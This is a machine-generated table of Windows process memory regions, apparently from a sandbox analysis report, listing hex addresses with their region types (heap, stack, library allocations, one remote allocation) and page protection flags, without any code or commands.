|
page read and write
|
||
7FFD34690000
|
trusted library allocation
|
page read and write
|
||
23E03570000
|
trusted library allocation
|
page read and write
|
||
251015B3000
|
trusted library allocation
|
page read and write
|
||
7FFD34490000
|
trusted library allocation
|
page read and write
|
||
1ABE0150000
|
trusted library allocation
|
page read and write
|
||
1C176B90000
|
heap
|
page execute and read and write
|
||
1ABF1DE4000
|
trusted library allocation
|
page read and write
|
||
25101752000
|
trusted library allocation
|
page read and write
|
||
251011F5000
|
trusted library allocation
|
page read and write
|
||
1BDB1942000
|
trusted library allocation
|
page read and write
|
||
1C1775B4000
|
heap
|
page read and write
|
||
25101C50000
|
trusted library allocation
|
page read and write
|
||
25101519000
|
trusted library allocation
|
page read and write
|
||
23E03EFA000
|
trusted library allocation
|
page read and write
|
||
2866F5E3000
|
heap
|
page read and write
|
||
199621B0000
|
trusted library allocation
|
page read and write
|
||
25101A6D000
|
trusted library allocation
|
page read and write
|
||
1C17748D000
|
heap
|
page read and write
|
||
1995F7DC000
|
heap
|
page read and write
|
||
2866F63E000
|
heap
|
page read and write
|
||
25101B8B000
|
trusted library allocation
|
page read and write
|
||
25178980000
|
heap
|
page execute and read and write
|
||
7FFD34780000
|
trusted library allocation
|
page read and write
|
||
7FFD34750000
|
trusted library allocation
|
page read and write
|
||
7FFD34662000
|
trusted library allocation
|
page read and write
|
||
2866FA84000
|
heap
|
page read and write
|
||
25110001000
|
trusted library allocation
|
page read and write
|
||
25101C74000
|
trusted library allocation
|
page read and write
|
||
23E13A61000
|
trusted library allocation
|
page read and write
|
||
7FFD346B0000
|
trusted library allocation
|
page read and write
|
||
970000
|
heap
|
page read and write
|
||
23E1BE6C000
|
heap
|
page read and write
|
||
1C101E24000
|
trusted library allocation
|
page read and write
|
||
2866F673000
|
heap
|
page read and write
|
||
251018C5000
|
trusted library allocation
|
page read and write
|
||
7FFD34641000
|
trusted library allocation
|
page read and write
|
||
937D50C000
|
stack
|
page read and write
|
||
25101C07000
|
trusted library allocation
|
page read and write
|
||
25178600000
|
trusted library allocation
|
page read and write
|
||
25101807000
|
trusted library allocation
|
page read and write
|
||
25101492000
|
trusted library allocation
|
page read and write
|
||
25101809000
|
trusted library allocation
|
page read and write
|
||
7FFD34622000
|
trusted library allocation
|
page read and write
|
||
251787D3000
|
heap
|
page read and write
|
||
25101763000
|
trusted library allocation
|
page read and write
|
||
2510136B000
|
trusted library allocation
|
page read and write
|
||
251015AC000
|
trusted library allocation
|
page read and write
|
||
7FFD344CB000
|
trusted library allocation
|
page read and write
|
||
251017A6000
|
trusted library allocation
|
page read and write
|
||
251014CF000
|
trusted library allocation
|
page read and write
|
||
7FFD345A0000
|
trusted library allocation
|
page execute and read and write
|
||
937D38D000
|
stack
|
page read and write
|
||
6C6EBFE000
|
stack
|
page read and write
|
||
1995F83F000
|
heap
|
page read and write
|
||
251019B9000
|
trusted library allocation
|
page read and write
|
||
25101609000
|
trusted library allocation
|
page read and write
|
||
25110077000
|
trusted library allocation
|
page read and write
|
||
251015FC000
|
trusted library allocation
|
page read and write
|
||
1997177D000
|
trusted library allocation
|
page read and write
|
||
1C176E0A000
|
heap
|
page read and write
|
||
23E1BE2B000
|
heap
|
page read and write
|
||
2866F635000
|
heap
|
page read and write
|
||
7FFD346D0000
|
trusted library allocation
|
page read and write
|
||
F6F8E7F000
|
stack
|
page read and write
|
||
2517671A000
|
heap
|
page read and write
|
||
199799B0000
|
heap
|
page read and write
|
||
2866D840000
|
heap
|
page read and write
|
||
1EB4D3D7000
|
trusted library allocation
|
page read and write
|
||
251015CC000
|
trusted library allocation
|
page read and write
|
||
23E019A0000
|
heap
|
page read and write
|
||
25101B7B000
|
trusted library allocation
|
page read and write
|
||
23E13ABC000
|
trusted library allocation
|
page read and write
|
||
2510183A000
|
trusted library allocation
|
page read and write
|
||
29B57460000
|
heap
|
page read and write
|
||
1C176AD0000
|
heap
|
page readonly
|
||
1BDB047F000
|
trusted library allocation
|
page read and write
|
||
7FFD34664000
|
trusted library allocation
|
page read and write
|
||
25178640000
|
heap
|
page read and write
|
||
25101C93000
|
trusted library allocation
|
page read and write
|
||
1EB65530000
|
heap
|
page execute and read and write
|
||
2866F673000
|
heap
|
page read and write
|
||
57E7AFB000
|
stack
|
page read and write
|
||
2866D838000
|
heap
|
page read and write
|
||
5BBDB4E000
|
stack
|
page read and write
|
||
251018F7000
|
trusted library allocation
|
page read and write
|
||
25101746000
|
trusted library allocation
|
page read and write
|
||
7FFD34690000
|
trusted library allocation
|
page read and write
|
||
25101431000
|
trusted library allocation
|
page read and write
|
||
251016BB000
|
trusted library allocation
|
page read and write
|
||
303F000
|
stack
|
page read and write
|
||
25101AB2000
|
trusted library allocation
|
page read and write
|
||
25101622000
|
trusted library allocation
|
page read and write
|
||
25101C9A000
|
trusted library allocation
|
page read and write
|
||
7FFD34550000
|
trusted library allocation
|
page execute and read and write
|
||
251012E1000
|
trusted library allocation
|
page read and write
|
||
FDBFCFF000
|
stack
|
page read and write
|
||
25101961000
|
trusted library allocation
|
page read and write
|
||
25101315000
|
trusted library allocation
|
page read and write
|
||
7FFD34484000
|
trusted library allocation
|
page read and write
|
||
23E01970000
|
heap
|
page read and write
|
||
1BDC8340000
|
heap
|
page read and write
|
||
23E01A10000
|
heap
|
page read and write
|
||
25101660000
|
trusted library allocation
|
page read and write
|
||
1BDC8300000
|
heap
|
page read and write
|
||
25101C1C000
|
trusted library allocation
|
page read and write
|
||
1C1774C3000
|
heap
|
page read and write
|
||
1C110011000
|
trusted library allocation
|
page read and write
|
||
2866FB11000
|
heap
|
page read and write
|
||
5BBC9F7000
|
stack
|
page read and write
|
||
1997991D000
|
heap
|
page read and write
|
||
1EB6578E000
|
heap
|
page read and write
|
||
2510193D000
|
trusted library allocation
|
page read and write
|
||
1EB65718000
|
heap
|
page read and write
|
||
F5EE0FD000
|
stack
|
page read and write
|
||
4919AFD000
|
stack
|
page read and write
|
||
1BDBFF31000
|
trusted library allocation
|
page read and write
|
||
25101A47000
|
trusted library allocation
|
page read and write
|
||
251018F3000
|
trusted library allocation
|
page read and write
|
||
25101505000
|
trusted library allocation
|
page read and write
|
||
2510180F000
|
trusted library allocation
|
page read and write
|
||
2510121B000
|
trusted library allocation
|
page read and write
|
||
9C0000
|
heap
|
page read and write
|
||
7FFD3449D000
|
trusted library allocation
|
page execute and read and write
|
||
25101BAA000
|
trusted library allocation
|
page read and write
|
||
1ABF9FE7000
|
heap
|
page read and write
|
||
7FFD348D0000
|
trusted library allocation
|
page read and write
|
||
116764D000
|
stack
|
page read and write
|
||
7FFD34662000
|
trusted library allocation
|
page read and write
|
||
25101A6F000
|
trusted library allocation
|
page read and write
|
||
251017F5000
|
trusted library allocation
|
page read and write
|
||
25101651000
|
trusted library allocation
|
page read and write
|
||
15EB4880000
|
heap
|
page read and write
|
||
1EB4B3B0000
|
heap
|
page read and write
|
||
25101A78000
|
trusted library allocation
|
page read and write
|
||
25101A81000
|
trusted library allocation
|
page read and write
|
||
7FFD34750000
|
trusted library allocation
|
page read and write
|
||
23E01ADA000
|
heap
|
page read and write
|
||
1BDAE37F000
|
heap
|
page read and write
|
||
1BDC0215000
|
trusted library allocation
|
page read and write
|
||
25101648000
|
trusted library allocation
|
page read and write
|
||
1ABE2C03000
|
trusted library allocation
|
page read and write
|
||
25101B24000
|
trusted library allocation
|
page read and write
|
||
25101A2F000
|
trusted library allocation
|
page read and write
|
||
25101965000
|
trusted library allocation
|
page read and write
|
||
25101305000
|
trusted library allocation
|
page read and write
|
||
1BDB0484000
|
trusted library allocation
|
page read and write
|
||
251016AA000
|
trusted library allocation
|
page read and write
|
||
7FFD347A0000
|
trusted library allocation
|
page read and write
|
||
23E03D1D000
|
trusted library allocation
|
page read and write
|
||
1EB4CE30000
|
heap
|
page read and write
|
||
25101B89000
|
trusted library allocation
|
page read and write
|
||
11667F9000
|
stack
|
page read and write
|
||
1ABE0010000
|
heap
|
page read and write
|
||
2866F848000
|
heap
|
page read and write
|
||
15EC61B0000
|
trusted library allocation
|
page read and write
|
||
251013D9000
|
trusted library allocation
|
page read and write
|
||
1BDAE460000
|
trusted library allocation
|
page read and write
|
||
7FFD34530000
|
trusted library allocation
|
page read and write
|
||
25101A7B000
|
trusted library allocation
|
page read and write
|
||
1EB4D582000
|
trusted library allocation
|
page read and write
|
||
25101AB5000
|
trusted library allocation
|
page read and write
|
||
7FFD34566000
|
trusted library allocation
|
page execute and read and write
|
||
25101B8D000
|
trusted library allocation
|
page read and write
|
||
2866F6DE000
|
heap
|
page read and write
|
||
7FFD34720000
|
trusted library allocation
|
page read and write
|
||
1C177499000
|
heap
|
page read and write
|
||
25101B54000
|
trusted library allocation
|
page read and write
|
||
7FFD34550000
|
trusted library allocation
|
page execute and read and write
|
||
25101924000
|
trusted library allocation
|
page read and write
|
||
7FFD34720000
|
trusted library allocation
|
page read and write
|
||
25101836000
|
trusted library allocation
|
page read and write
|
||
1ABE325F000
|
trusted library allocation
|
page read and write
|
||
25101C79000
|
trusted library allocation
|
page read and write
|
||
25101B94000
|
trusted library allocation
|
page read and write
|
||
251013E4000
|
trusted library allocation
|
page read and write
|
||
25101508000
|
trusted library allocation
|
page read and write
|
||
7FFD3477C000
|
trusted library allocation
|
page read and write
|
||
25101908000
|
trusted library allocation
|
page read and write
|
||
251017E5000
|
trusted library allocation
|
page read and write
|
||
1C101866000
|
trusted library allocation
|
page read and write
|
||
2510159E000
|
trusted library allocation
|
page read and write
|
||
25178220000
|
heap
|
page read and write
|
||
2510169D000
|
trusted library allocation
|
page read and write
|
||
251017CB000
|
trusted library allocation
|
page read and write
|
||
11665FB000
|
stack
|
page read and write
|
||
7FFD34674000
|
trusted library allocation
|
page read and write
|
||
7FFD34483000
|
trusted library allocation
|
page execute and read and write
|
||
251019C8000
|
trusted library allocation
|
page read and write
|
||
23E01ABA000
|
heap
|
page read and write
|
||
1BDB16C8000
|
trusted library allocation
|
page read and write
|
||
1166938000
|
stack
|
page read and write
|
||
1C17751A000
|
heap
|
page read and write
|
||
25101C5A000
|
trusted library allocation
|
page read and write
|
||
7FFD346A0000
|
trusted library allocation
|
page read and write
|
||
23E03C7C000
|
trusted library allocation
|
page read and write
|
||
25101B04000
|
trusted library allocation
|
page read and write
|
||
937C6BE000
|
stack
|
page read and write
|
||
25101A3A000
|
trusted library allocation
|
page read and write
|
||
2510153D000
|
trusted library allocation
|
page read and write
|
||
199616B0000
|
trusted library section
|
page read and write
|
||
2510162D000
|
trusted library allocation
|
page read and write
|
||
23E019C0000
|
heap
|
page read and write
|
||
251767AA000
|
heap
|
page read and write
|
||
937C47E000
|
stack
|
page read and write
|
||
7FFD34493000
|
trusted library allocation
|
page execute and read and write
|
||
25101C8C000
|
trusted library allocation
|
page read and write
|
||
23E03F19000
|
trusted library allocation
|
page read and write
|
||
25101B79000
|
trusted library allocation
|
page read and write
|
||
1ABF1DD4000
|
trusted library allocation
|
page read and write
|
||
19961BBC000
|
trusted library allocation
|
page read and write
|
||
251019D3000
|
trusted library allocation
|
page read and write
|
||
251015DA000
|
trusted library allocation
|
page read and write
|
||
23E1BE3C000
|
heap
|
page read and write
|
||
2866FBE6000
|
heap
|
page read and write
|
||
1EB4DDBE000
|
trusted library allocation
|
page read and write
|
||
7DF443CB0000
|
trusted library allocation
|
page execute and read and write
|
||
2865373A000
|
heap
|
page read and write
|
||
25101461000
|
trusted library allocation
|
page read and write
|
||
7FFD3456C000
|
trusted library allocation
|
page execute and read and write
|
||
5BBC8FA000
|
stack
|
page read and write
|
||
25101BEF000
|
trusted library allocation
|
page read and write
|
||
1ABE342C000
|
trusted library allocation
|
page read and write
|
||
251019CF000
|
trusted library allocation
|
page read and write
|
||
7FFD34710000
|
trusted library allocation
|
page read and write
|
||
25101C17000
|
trusted library allocation
|
page read and write
|
||
25101605000
|
trusted library allocation
|
page read and write
|
||
251018E9000
|
trusted library allocation
|
page read and write
|
||
7FFD348C0000
|
trusted library allocation
|
page read and write
|
||
1ABE2532000
|
trusted library allocation
|
page read and write
|
||
3FC5E8D000
|
stack
|
page read and write
|
||
25101A64000
|
trusted library allocation
|
page read and write
|
||
15ECE77E000
|
heap
|
page read and write
|
||
1C101E1F000
|
trusted library allocation
|
page read and write
|
||
7FFD34660000
|
trusted library allocation
|
page execute and read and write
|
||
1BDC0206000
|
trusted library allocation
|
page read and write
|
||
25101B28000
|
trusted library allocation
|
page read and write
|
||
25101825000
|
trusted library allocation
|
page read and write
|
||
2866FB3D000
|
heap
|
page read and write
|
||
491AB0E000
|
stack
|
page read and write
|
||
1BDB1691000
|
trusted library allocation
|
page read and write
|
||
7FFD34680000
|
trusted library allocation
|
page read and write
|
||
7FFD3464A000
|
trusted library allocation
|
page read and write
|
||
25101655000
|
trusted library allocation
|
page read and write
|
||
25101B84000
|
trusted library allocation
|
page read and write
|
||
15EB4470000
|
heap
|
page read and write
|
||
19961BCD000
|
trusted library allocation
|
page read and write
|
||
25101BA2000
|
trusted library allocation
|
page read and write
|
||
7FFD347A0000
|
trusted library allocation
|
page read and write
|
||
1ABFA3F8000
|
heap
|
page read and write
|
||
7FFD34492000
|
trusted library allocation
|
page read and write
|
||
937BEF3000
|
stack
|
page read and write
|
||
25101928000
|
trusted library allocation
|
page read and write
|
||
7FFD3464A000
|
trusted library allocation
|
page read and write
|
||
1C101004000
|
trusted library allocation
|
page read and write
|
||
2510185E000
|
trusted library allocation
|
page read and write
|
||
25101CB0000
|
trusted library allocation
|
page read and write
|
||
1995F780000
|
heap
|
page read and write
|
||
5BBC53E000
|
unkown
|
page read and write
|
||
1C1012A3000
|
trusted library allocation
|
page read and write
|
||
5BBC4B3000
|
stack
|
page read and write
|
||
1C1013BF000
|
trusted library allocation
|
page read and write
|
||
11666FE000
|
stack
|
page read and write
|
||
7FFD348E0000
|
trusted library allocation
|
page read and write
|
||
1EB4DDB6000
|
trusted library allocation
|
page read and write
|
||
25101BD8000
|
trusted library allocation
|
page read and write
|
||
1ABE2B9F000
|
trusted library allocation
|
page read and write
|
||
25101A1B000
|
trusted library allocation
|
page read and write
|
||
119E000
|
stack
|
page read and write
|
||
7FFD347F0000
|
trusted library allocation
|
page read and write
|
||
2517675E000
|
heap
|
page read and write
|
||
25101B6B000
|
trusted library allocation
|
page read and write
|
||
25101A55000
|
trusted library allocation
|
page read and write
|
||
2510168A000
|
trusted library allocation
|
page read and write
|
||
23E035E0000
|
heap
|
page read and write
|
||
25101BC1000
|
trusted library allocation
|
page read and write
|
||
1ABE2E1F000
|
trusted library allocation
|
page read and write
|
||
15EB7B7C000
|
trusted library allocation
|
page read and write
|
||
15ECE5DB000
|
heap
|
page read and write
|
||
1995F735000
|
heap
|
page read and write
|
||
25101A43000
|
trusted library allocation
|
page read and write
|
||
25101A01000
|
trusted library allocation
|
page read and write
|
||
25101C2D000
|
trusted library allocation
|
page read and write
|
||
7FFD34622000
|
trusted library allocation
|
page read and write
|
||
251011E3000
|
trusted library allocation
|
page read and write
|
||
1ABE2CF2000
|
trusted library allocation
|
page read and write
|
||
251014D6000
|
trusted library allocation
|
page read and write
|
||
1BDC851B000
|
heap
|
page read and write
|
||
1116000
|
heap
|
page read and write
|
||
25101ACD000
|
trusted library allocation
|
page read and write
|
||
7FFD347F0000
|
trusted library allocation
|
page read and write
|
||
25101CA1000
|
trusted library allocation
|
page read and write
|
||
1C175190000
|
heap
|
page read and write
|
||
2CBD000
|
stack
|
page read and write
|
||
251015D1000
|
trusted library allocation
|
page read and write
|
||
7FFD34730000
|
trusted library allocation
|
page read and write
|
||
25101CD2000
|
trusted library allocation
|
page read and write
|
||
251019AC000
|
trusted library allocation
|
page read and write
|
||
15EB4840000
|
heap
|
page read and write
|
||
251014D4000
|
trusted library allocation
|
page read and write
|
||
2510164C000
|
trusted library allocation
|
page read and write
|
||
1995F85B000
|
heap
|
page read and write
|
||
29B57235000
|
heap
|
page read and write
|
||
7FFD344C0000
|
trusted library allocation
|
page read and write
|
||
7FFD34800000
|
trusted library allocation
|
page read and write
|
||
2510192A000
|
trusted library allocation
|
page read and write
|
||
251767F0000
|
heap
|
page read and write
|
||
7FFD347A0000
|
trusted library allocation
|
page read and write
|
||
15EB6DD4000
|
trusted library allocation
|
page read and write
|
||
1BDB1675000
|
trusted library allocation
|
page read and write
|
||
25101697000
|
trusted library allocation
|
page read and write
|
||
2866F673000
|
heap
|
page read and write
|
||
25101860000
|
trusted library allocation
|
page read and write
|
||
6C6E8FE000
|
stack
|
page read and write
|
||
23E03470000
|
trusted library allocation
|
page read and write
|
||
2866F69C000
|
heap
|
page read and write
|
||
7FFD347B0000
|
trusted library allocation
|
page read and write
|
||
1ABF1DC6000
|
trusted library allocation
|
page read and write
|
||
1BDC87D0000
|
heap
|
page read and write
|
||
25178BA0000
|
heap
|
page read and write
|
||
1EB4D7FD000
|
trusted library allocation
|
page read and write
|
||
25101CD9000
|
trusted library allocation
|
page read and write
|
||
1BDC82E0000
|
trusted library section
|
page read and write
|
||
25101C2A000
|
trusted library allocation
|
page read and write
|
||
2510165E000
|
trusted library allocation
|
page read and write
|
||
57E7C7A000
|
stack
|
page read and write
|
||
25101D1D000
|
trusted library allocation
|
page read and write
|
||
1C176B50000
|
trusted library allocation
|
page read and write
|
||
1BDAE440000
|
trusted library allocation
|
page read and write
|
||
950000
|
heap
|
page read and write
|
||
2510170E000
|
trusted library allocation
|
page read and write
|
||
15EB7A31000
|
trusted library allocation
|
page read and write
|
||
7FFD34536000
|
trusted library allocation
|
page read and write
|
||
1ABFA41E000
|
heap
|
page read and write
|
||
1C1775F8000
|
heap
|
page read and write
|
||
23E03485000
|
heap
|
page read and write
|
||
307D000
|
stack
|
page read and write
|
||
1EB65764000
|
heap
|
page read and write
|
||
1BDC82F7000
|
heap
|
page execute and read and write
|
||
7FFD34730000
|
trusted library allocation
|
page read and write
|
||
23E03480000
|
heap
|
page read and write
|
||
251015EC000
|
trusted library allocation
|
page read and write
|
||
2510174C000
|
trusted library allocation
|
page read and write
|
||
25100725000
|
trusted library allocation
|
page read and write
|
||
7FFD346F0000
|
trusted library allocation
|
page read and write
|
||
5BBD8CE000
|
stack
|
page read and write
|
||
25100001000
|
trusted library allocation
|
page read and write
|
||
3FC537E000
|
stack
|
page read and write
|
||
1EB4CEE0000
|
heap
|
page execute and read and write
|
||
7FFD34790000
|
trusted library allocation
|
page read and write
|
||
3FC5179000
|
stack
|
page read and write
|
||
57E7D38000
|
stack
|
page read and write
|
||
25101B5D000
|
trusted library allocation
|
page read and write
|
||
2866FB2F000
|
heap
|
page read and write
|
||
1ABE26CB000
|
trusted library allocation
|
page read and write
|
||
1EB653C2000
|
heap
|
page read and write
|
||
F6F8A73000
|
stack
|
page read and write
|
||
7FFD345B0000
|
trusted library allocation
|
page execute and read and write
|
||
57E803C000
|
stack
|
page read and write
|
||
251017FB000
|
trusted library allocation
|
page read and write
|
||
E20000
|
heap
|
page read and write
|
||
25101CA4000
|
trusted library allocation
|
page read and write
|
||
25101992000
|
trusted library allocation
|
page read and write
|
||
25101C85000
|
trusted library allocation
|
page read and write
|
||
25101400000
|
trusted library allocation
|
page read and write
|
||
25101683000
|
trusted library allocation
|
page read and write
|
||
7FFD346F0000
|
trusted library allocation
|
page read and write
|
||
23E035D0000
|
heap
|
page execute and read and write
|
||
251017FD000
|
trusted library allocation
|
page read and write
|
||
25101C09000
|
trusted library allocation
|
page read and write
|
||
7FFD347D0000
|
trusted library allocation
|
page read and write
|
||
19961190000
|
trusted library allocation
|
page read and write
|
||
23E1BC48000
|
heap
|
page read and write
|
||
11668B7000
|
stack
|
page read and write
|
||
2866D836000
|
heap
|
page read and write
|
||
2866F89E000
|
heap
|
page read and write
|
||
2510178C000
|
trusted library allocation
|
page read and write
|
||
2DFC000
|
stack
|
page read and write
|
||
1996219A000
|
trusted library allocation
|
page read and write
|
||
25101786000
|
trusted library allocation
|
page read and write
|
||
2866F856000
|
heap
|
page read and write
|
||
1BDAE32A000
|
heap
|
page read and write
|
||
25101C98000
|
trusted library allocation
|
page read and write
|
||
7FFD34790000
|
trusted library allocation
|
page read and write
|
||
7FFD34740000
|
trusted library allocation
|
page read and write
|
||
25101C8A000
|
trusted library allocation
|
page read and write
|
||
2866FB10000
|
heap
|
page read and write
|
||
1ABFA050000
|
trusted library allocation
|
page read and write
|
||
25176715000
|
heap
|
page read and write
|
||
7FFD34750000
|
trusted library allocation
|
page read and write
|
||
25101794000
|
trusted library allocation
|
page read and write
|
||
3FC4CFF000
|
stack
|
page read and write
|
||
7FFD34650000
|
trusted library allocation
|
page execute and read and write
|
||
25101B4B000
|
trusted library allocation
|
page read and write
|
||
25101A41000
|
trusted library allocation
|
page read and write
|
||
1ABE00C6000
|
heap
|
page read and write
|
||
251019DE000
|
trusted library allocation
|
page read and write
|
||
7FFD34790000
|
trusted library allocation
|
page read and write
|
||
2510198E000
|
trusted library allocation
|
page read and write
|
||
1ABE0190000
|
trusted library allocation
|
page read and write
|
||
251019AE000
|
trusted library allocation
|
page read and write
|
||
1EB65399000
|
heap
|
page read and write
|
||
1995F6E0000
|
heap
|
page read and write
|
||
251017E7000
|
trusted library allocation
|
page read and write
|
||
F6C000
|
stack
|
page read and write
|
||
251018B7000
|
trusted library allocation
|
page read and write
|
||
7FFD347C0000
|
trusted library allocation
|
page read and write
|
||
25101885000
|
trusted library allocation
|
page read and write
|
||
57E7A7E000
|
stack
|
page read and write
|
||
7FFD34730000
|
trusted library allocation
|
page read and write
|
||
7FFD346B0000
|
trusted library allocation
|
page read and write
|
||
1C10188C000
|
trusted library allocation
|
page read and write
|
||
251017DB000
|
trusted library allocation
|
page read and write
|
||
25101584000
|
trusted library allocation
|
page read and write
|
||
25101BF9000
|
trusted library allocation
|
page read and write
|
||
49197CF000
|
stack
|
page read and write
|
||
1C176E50000
|
heap
|
page execute and read and write
|
||
7FFD34484000
|
trusted library allocation
|
page read and write
|
||
2866F673000
|
heap
|
page read and write
|
||
251766D0000
|
heap
|
page read and write
|
||
2866F6DE000
|
heap
|
page read and write
|
||
7FFD34750000
|
trusted library allocation
|
page read and write
|
||
7FFD3448D000
|
trusted library allocation
|
page execute and read and write
|
||
1BDAFDB0000
|
heap
|
page execute and read and write
|
||
7FFD34690000
|
trusted library allocation
|
page read and write
|
||
1EB4B330000
|
heap
|
page read and write
|
||
2510009F000
|
trusted library allocation
|
page read and write
|
||
1C100A51000
|
trusted library allocation
|
page read and write
|
||
2866F82D000
|
heap
|
page read and write
|
||
2DBF000
|
stack
|
page read and write
|
||
1C175170000
|
heap
|
page read and write
|
||
1ABFA077000
|
heap
|
page execute and read and write
|
||
1C175243000
|
heap
|
page read and write
|
||
1BDB1C3E000
|
trusted library allocation
|
page read and write
|
||
1ABE0214000
|
heap
|
page read and write
|
||
1BDC856E000
|
heap
|
page read and write
|
||
7FFD34632000
|
trusted library allocation
|
page read and write
|
||
1BDC8423000
|
heap
|
page read and write
|
||
25101AF9000
|
trusted library allocation
|
page read and write
|
||
7FFD346F0000
|
trusted library allocation
|
page read and write
|
||
25101BED000
|
trusted library allocation
|
page read and write
|
||
25101C87000
|
trusted library allocation
|
page read and write
|
||
4919B7E000
|
stack
|
page read and write
|
||
25101788000
|
trusted library allocation
|
page read and write
|
||
1ABE1AA0000
|
heap
|
page execute and read and write
|
||
1ABE38DE000
|
trusted library allocation
|
page read and write
|
||
2866F866000
|
heap
|
page read and write
|
||
25101C80000
|
trusted library allocation
|
page read and write
|
||
25101359000
|
trusted library allocation
|
page read and write
|
||
57E787F000
|
stack
|
page read and write
|
||
25101A98000
|
trusted library allocation
|
page read and write
|
||
25110180000
|
trusted library allocation
|
page read and write
|
||
1ABFA019000
|
heap
|
page read and write
|
||
1ABE00CC000
|
heap
|
page read and write
|
||
15EB7DD6000
|
trusted library allocation
|
page read and write
|
||
7FFD34566000
|
trusted library allocation
|
page execute and read and write
|
||
1C1774F5000
|
heap
|
page read and write
|
||
1BDC82F0000
|
heap
|
page execute and read and write
|
||
2866FB14000
|
heap
|
page read and write
|
||
7FFD34770000
|
trusted library allocation
|
page read and write
|
||
25101917000
|
trusted library allocation
|
page read and write
|
||
1C1010BD000
|
trusted library allocation
|
page read and write
|
||
251016C6000
|
trusted library allocation
|
page read and write
|
||
25101B16000
|
trusted library allocation
|
page read and write
|
||
1ABE0082000
|
heap
|
page read and write
|
||
25100D31000
|
trusted library allocation
|
page read and write
|
||
25101A4C000
|
trusted library allocation
|
page read and write
|
||
2866F882000
|
heap
|
page read and write
|
||
25101BB7000
|
trusted library allocation
|
page read and write
|
||
25101761000
|
trusted library allocation
|
page read and write
|
||
15EB45DD000
|
heap
|
page read and write
|
||
2866F865000
|
heap
|
page read and write
|
||
25101790000
|
trusted library allocation
|
page read and write
|
||
199616C7000
|
heap
|
page execute and read and write
|
||
15ECE4E0000
|
heap
|
page read and write
|
||
7FFD3454C000
|
trusted library allocation
|
page execute and read and write
|
||
2866F6DE000
|
heap
|
page read and write
|
||
15EB45FD000
|
heap
|
page read and write
|
||
25101A05000
|
trusted library allocation
|
page read and write
|
||
25178E50000
|
heap
|
page read and write
|
||
1995F730000
|
heap
|
page read and write
|
||
7FFD346E0000
|
trusted library allocation
|
page read and write
|
||
19979AEB000
|
heap
|
page read and write
|
||
251016DD000
|
trusted library allocation
|
page read and write
|
||
25101939000
|
trusted library allocation
|
page read and write
|
||
2866FBE6000
|
heap
|
page read and write
|
||
1C177466000
|
heap
|
page read and write
|
||
1ABFA11E000
|
heap
|
page read and write
|
||
1C175194000
|
heap
|
page read and write
|
||
2866F64B000
|
heap
|
page read and write
|
||
2510186A000
|
trusted library allocation
|
page read and write
|
||
471000
|
remote allocation
|
page execute and read and write
|
||
251014B6000
|
trusted library allocation
|
page read and write
|
||
2510184A000
|
trusted library allocation
|
page read and write
|
||
7DF443CA0000
|
trusted library allocation
|
page execute and read and write
|
||
25101617000
|
trusted library allocation
|
page read and write
|
||
2866F811000
|
heap
|
page read and write
|
||
251018F1000
|
trusted library allocation
|
page read and write
|
||
1C175272000
|
heap
|
page read and write
|
||
2510156F000
|
trusted library allocation
|
page read and write
|
||
2866D920000
|
heap
|
page read and write
|
||
2866F882000
|
heap
|
page read and write
|
||
7FFD34672000
|
trusted library allocation
|
page read and write
|
||
25101B0D000
|
trusted library allocation
|
page read and write
|
||
E6C000
|
stack
|
page read and write
|
||
7FFD34672000
|
trusted library allocation
|
page read and write
|
||
1ABFA3AE000
|
heap
|
page read and write
|
||
251015F3000
|
trusted library allocation
|
page read and write
|
||
7FFD34780000
|
trusted library allocation
|
page read and write
|
||
25101C55000
|
trusted library allocation
|
page read and write
|
||
25101C77000
|
trusted library allocation
|
page read and write
|
||
25101B72000
|
trusted library allocation
|
page read and write
|
||
4919DB7000
|
stack
|
page read and write
|
||
2510188D000
|
trusted library allocation
|
page read and write
|
||
7FFD345D0000
|
trusted library allocation
|
page execute and read and write
|
||
19979893000
|
heap
|
page read and write
|
||
19961BCF000
|
trusted library allocation
|
page read and write
|
||
980000
|
heap
|
page read and write
|
||
1C176B10000
|
trusted library allocation
|
page read and write
|
||
7FFD34536000
|
trusted library allocation
|
page read and write
|
||
25101B34000
|
trusted library allocation
|
page read and write
|
||
6C6EFFE000
|
stack
|
page read and write
|
||
251013E1000
|
trusted library allocation
|
page read and write
|
||
3FC50FC000
|
stack
|
page read and write
|
||
251785C0000
|
trusted library allocation
|
page read and write
|
||
25101308000
|
trusted library allocation
|
page read and write
|
||
2510178E000
|
trusted library allocation
|
page read and write
|
||
1EB4D81C000
|
trusted library allocation
|
page read and write
|
||
251767C2000
|
heap
|
page read and write
|
||
25101906000
|
trusted library allocation
|
page read and write
|
||
7FFD347D9000
|
trusted library allocation
|
page read and write
|
||
25101485000
|
trusted library allocation
|
page read and write
|
||
7FFD346C0000
|
trusted library allocation
|
page read and write
|
||
2510196C000
|
trusted library allocation
|
page read and write
|
||
25101643000
|
trusted library allocation
|
page read and write
|
||
1ABDFFD0000
|
heap
|
page read and write
|
||
15EC61A1000
|
trusted library allocation
|
page read and write
|
||
1BDBFF8C000
|
trusted library allocation
|
page read and write
|
||
2866F848000
|
heap
|
page read and write
|
||
7FFD34641000
|
trusted library allocation
|
page read and write
|
||
1EB657BE000
|
heap
|
page read and write
|
||
25101C4E000
|
trusted library allocation
|
page read and write
|
||
1ABFA2C0000
|
heap
|
page read and write
|
||
25101247000
|
trusted library allocation
|
page read and write
|
||
25101542000
|
trusted library allocation
|
page read and write
|
||
7FFD34730000
|
trusted library allocation
|
page read and write
|
||
1EB4B380000
|
heap
|
page read and write
|
||
251019E5000
|
trusted library allocation
|
page read and write
|
||
1BDAE522000
|
trusted library allocation
|
page read and write
|
||
2EFF000
|
stack
|
page read and write
|
||
251017D3000
|
trusted library allocation
|
page read and write
|
||
1995F7E3000
|
heap
|
page read and write
|
||
7FFD34720000
|
trusted library allocation
|
page read and write
|
||
7FFD346A0000
|
trusted library allocation
|
page execute and read and write
|
||
2866F6DE000
|
heap
|
page read and write
|
||
1BDB164A000
|
trusted library allocation
|
page read and write
|
||
25101A9C000
|
trusted library allocation
|
page read and write
|
||
25101AC0000
|
trusted library allocation
|
page read and write
|
||
7FFD34482000
|
trusted library allocation
|
page read and write
|
||
25101CC3000
|
trusted library allocation
|
page read and write
|
||
15EB45E3000
|
heap
|
page read and write
|
||
940000
|
heap
|
page read and write
|
||
2510181F000
|
trusted library allocation
|
page read and write
|
||
1ABE0040000
|
heap
|
page read and write
|
||
1BDAE4F0000
|
trusted library allocation
|
page read and write
|
||
25101817000
|
trusted library allocation
|
page read and write
|
||
1ABF9F30000
|
heap
|
page read and write
|
||
251017CD000
|
trusted library allocation
|
page read and write
|
||
7FFD34631000
|
trusted library allocation
|
page read and write
|
